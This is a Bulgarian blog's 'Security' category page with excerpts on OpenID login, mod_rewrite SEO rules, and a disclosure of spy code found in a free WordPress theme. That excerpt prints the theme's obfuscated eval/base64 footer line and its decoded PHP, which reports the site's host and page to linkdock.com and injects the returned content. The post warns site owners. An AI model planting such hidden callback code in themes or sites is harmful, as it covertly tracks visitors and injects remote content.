Статии от категория ‘Сигурност’

Логване в сайт с OpenID през Google
Публикувано в (Сигурност, Уеб програмиране) от gan на 28 януари 2010 в 16:08

Ограничен достъп и логване с OpenID

Някой от страниците на сайта ganbox.com реших да са достъпни само след логване, затова ми се наложи да си направя логин форма, през която потребителите да се логват и да получават достъп. Обикновено една такава система включва в себе си няколко функции: страница за регистриране, страница за логване, страница за забравена парола, страница за промяна на парола или други лични данни, управление на сесии, база данни с данни за потребителите. Мислих няколко варианта и накрая реших, че без последните две няма как да мина, но нямам време да правя другите страници. Затова избрах решение с OpenID логване.

Какво е OpenID?

Съвсем накратко: с една парола достъп до много сайтове. Това е метод, който обединява протокол и системи, който ти дава възможност да се регистрираш в един… прочети цялата статия»
Напиши коментар    Текст на статия


Код за шпиониране в Wordpress
Публикувано в (Сигурност, Уеб програмиране) от gan на 16 август 2009 в 15:52

Код за проследяване

Пиша тази статия за всички ползващи Wordpress, които не обичат да ги следят без тяхно знание. Проблем: Безплатна тема за Wordpress с име Red_wave от автор AskGraphics се разпространява свободно на сайта http://wordpresstemplates.name, но открих, че съдържа във файла footer.php следния PHP код: <? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+ X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5 K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNS Se/o3KiJhSMq1Fk6i5rCV1llGS6mAHub2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqmodSM0h5p4 HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?> (Всичко това е на един ред). Което всъщност представлява следния зашифрован PHP код за проследяване: error_reporting(0); $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"]) ."&uri=".urlencode($_SERVER["REQUEST_URI"]); if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL); } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content); } elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } Както се вижда този скрипт изпраща до сървъра linkdock.com не само името на вашия домейн, а и точната страница, която в момента отваря посетителя.

Защо го правят?

С този код получават интернет трафик от… прочети цялата статия»
(6) коментара    Текст на статия


Приложна магия с mod_rewrite в htaccess
Публикувано в (SEO, Сигурност) от gan на 10 юни 2009 в 19:30

Пренаписване на интернет адреси с .htaccess

Промяната на интернет адреси с mod_rewrite се прави основно по следните seo причини:
  • съкращаване на адресите: адресите стават за индексиране от търсачките (seo friendly) и лесни за ръчно изписване в браузър
  • пренасочване на стари адреси към нови при преименуване на файлове на страници
  • ако има страници, които се достъпват с повече от един адрес се пренасочват излишните адреси
  • скриване на вида файлове на страниците на сайта
Пренасочванията се извършват от правила зададени във файла .htaccess, който трябва да се намира в главната уеб директория. Правилата използват регулярни изрази (regular expressions) и могат да бъдат много сложни. В тази статия обаче ще разгледам само най-често ползваните правила от SEO специалистите. За да работи този файл е нужно уеб сървъра да има инсталиран модул mod_rewrite и в конфигурационния файл /etc/httpd/conf/httpd.conf  трябва да е зададена… прочети цялата статия»
(6) коментара    Текст на статия